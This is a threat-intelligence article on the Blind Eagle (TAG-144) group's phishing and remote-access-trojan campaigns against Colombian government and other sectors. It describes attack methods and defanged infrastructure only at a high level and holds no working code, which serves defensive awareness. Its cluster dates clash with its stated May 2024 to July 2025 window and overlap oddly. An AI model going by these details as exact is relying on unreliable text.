Between May 2024 and July 2025, cybersecurity researchers identified five distinct activity clusters associated with the persistent threat actor known as Blind Eagle. These campaigns primarily targeted various levels of the Colombian government, including local, municipal, and federal entities. Recorded Future’s Insikt Group, which tracks this activity under the designation TAG-144, noted that while these clusters share similar tactics, techniques, and procedures (TTPs), they exhibit significant differences in infrastructure, malware deployment, and operational methods.
Background on Blind Eagle
Active since at least 2018, Blind Eagle has a history of targeting organizations across South America, particularly in Colombia, Ecuador, Chile, and Panama. Their operations reflect a dual motivation encompassing both cyber espionage and financial gain. Recent campaigns have demonstrated this duality by incorporating banking-related keylogging and browser monitoring alongside attacks on government entities using various remote access trojans (RATs).
Targeted Sectors and Geographical Focus
Blind Eagle’s attacks have been directed at a diverse range of sectors, including:
– Judiciary and tax authorities
– Financial institutions
– Petroleum and energy companies
– Educational organizations
– Healthcare providers
– Manufacturing firms
– Professional services
While the primary focus remains on Colombia, there have been instances of targeting in Ecuador, Chile, Panama, and even Spanish-speaking users in North America.
Attack Methodology
Blind Eagle employs spear-phishing campaigns that impersonate local government agencies to lure recipients into opening malicious documents or clicking on links concealed using URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to. The group utilizes compromised email accounts to distribute these messages and implements geofencing techniques to redirect users to official government websites when attempts are made to access attacker-controlled infrastructure from outside Colombia or Ecuador.
Infrastructure and Tools
The group’s command-and-control (C2) infrastructure often incorporates IP addresses from Colombian ISPs alongside virtual private servers (VPS) such as Proton666 and VPN services like Powerhouse Management, FrootVPN, and TorGuard. This setup is further enhanced by the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and noip[.]com.
Blind Eagle also leverages legitimate internet services for staging payloads, including Bitbucket, Discord, Dropbox, GitHub, Google Drive, the Internet Archive, lovestoblog.com, Paste.ee, Tagbox, and lesser-known Brazilian image-hosting websites. This strategy helps obscure malicious content and evade detection.
Malware Deployment
Recent campaigns have employed Visual Basic Script files as droppers to execute dynamically generated PowerShell scripts at runtime. These scripts reach out to external servers to download injector modules responsible for loading various RATs, such as Lime RAT, DCRat, AsyncRAT, or Remcos RAT.
Activity Clusters
Recorded Future’s analysis identified five clusters of activity:
1. Cluster 1 (February – July 2025): Targeted Colombian government entities exclusively, deploying DCRat, AsyncRAT, and Remcos RAT.
2. Cluster 2 (September – December 2024): Targeted Colombian government and private sector entities, utilizing similar malware.
3. Cluster 3 (May – August 2024): Focused on financial institutions in Colombia, deploying banking-related keyloggers and browser monitoring tools.
4. Cluster 4 (January – April 2024): Targeted energy and petroleum sectors in Colombia and Ecuador, using customized RATs.
5. Cluster 5 (September – December 2023): Aimed at healthcare and educational institutions in Colombia, employing a combination of phishing lures and RATs.
Conclusion
Blind Eagle’s consistent use of well-established methods underscores the effectiveness of their tactics in the region. The group’s ability to adapt and diversify its attack vectors, while maintaining a focus on specific geographical areas and sectors, highlights the ongoing threat posed by this actor.
